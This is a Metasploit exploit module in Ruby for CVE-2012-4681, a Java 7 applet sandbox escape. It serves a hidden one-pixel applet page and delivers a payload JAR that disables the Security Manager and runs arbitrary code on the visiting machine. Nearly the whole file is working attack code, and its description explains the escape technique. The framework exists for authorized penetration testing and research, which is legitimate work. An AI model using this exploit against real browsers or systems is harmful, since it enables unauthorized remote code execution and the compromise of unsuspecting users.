##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
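# Browser exploit for CVE-2012-4681 (Java 7 ClassFinder / MethodFinder.findMethod
# sandbox escape). The module serves a one-pixel applet page; the applet class
# shipped in the framework data directory is packed into the payload JAR and
# served when the browser fetches "Exploit.jar".
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java 7 Applet Remote Code Execution',
        'Description' => %q{
          The exploit takes advantage of two issues in JDK 7: The ClassFinder and
          MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a
          replacement for classForName back in JDK 6. It allows untrusted code to obtain a
          reference and have access to a restricted package in JDK 7, which can be used to
          abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can
          actually invoke getField() by abusing findMethod() in Statement.invokeInternal()
          (but getField() must be public, and that's not always the case in JDK 6) in order
          to access Statement.acc's private field, modify AccessControlContext, and then
          disable Security Manager. Once Security Manager is disabled, we can execute
          arbitrary Java code.

          Our exploit has been tested successfully against multiple platforms, including:
          IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory
          'James Forshaw', # Vulnerability discovery according to Oracle's advisory
          'jduck', # metasploit module
          'sinn3r', # metasploit module
          'juan vazquez' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-4681' ],
          [ 'OSVDB', '84867' ],
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']
        ],
        'Platform' => %w{java linux win},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-08-26',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request handler for the module's resource URI.
  #
  # Two kinds of request are served:
  #   * a URI that does not end in ".jar" gets the applet-embedding HTML page,
  #     after a redirect to the trailing-slash form so that the page's relative
  #     archive="Exploit.jar" reference resolves beneath the module resource;
  #   * a URI ending in ".jar" gets the encoded payload JAR with the shipped
  #     Exploit.class added, and the payload handler is started.
  #
  # The request URI is only pattern-matched here; the on-disk path of the
  # applet class is built from fixed module strings and never from client
  # input, so no path-traversal surface exists in this handler.
  #
  # @param cli     the connected HTTP client (framework server client object)
  # @param request the parsed HTTP request (exposes #uri)
  # @return [void]
  def on_request_uri(cli, request)
    unless request.uri.match(/\.jar$/i)
      unless request.uri.match(/\/$/)
        send_redirect(cli, get_resource + '/', '')
        return
      end

      print_status("#{self.name} handling request")

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    # Each entry is a path (as components) inside the JAR; the same components
    # locate the file under data/exploits/CVE-2012-4681/.
    paths = [
      [ "Exploit.class" ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
      # Make sure every intermediate directory entry exists before the file is
      # added (a no-op for a top-level entry such as Exploit.class).
      1.upto(path.length - 1) do |idx|
        dir_entry = path[0, idx].join("/") + "/"
        jar.add_file(dir_entry, '') unless jar.entries.any? { |e| e.name == dir_entry }
      end

      # File.binread closes the descriptor even when the read raises; the
      # previous open/read/close sequence leaked the handle on error.
      class_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2012-4681", path)
      jar.add_file(path.join("/"), File.binread(class_file))
    end

    print_status("Sending Applet.jar")
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

    handler(cli)
  end

  # Builds the landing page: a minimal document embedding a 1x1 applet whose
  # archive is the relative URL "Exploit.jar" (served by #on_request_uri).
  #
  # @return [String] the HTML document
  def generate_html
    '<html><head></head>' \
      '<body>' \
      '<applet archive="Exploit.jar" code="Exploit.class" width="1" height="1">' \
      '</applet></body></html>'
  end
end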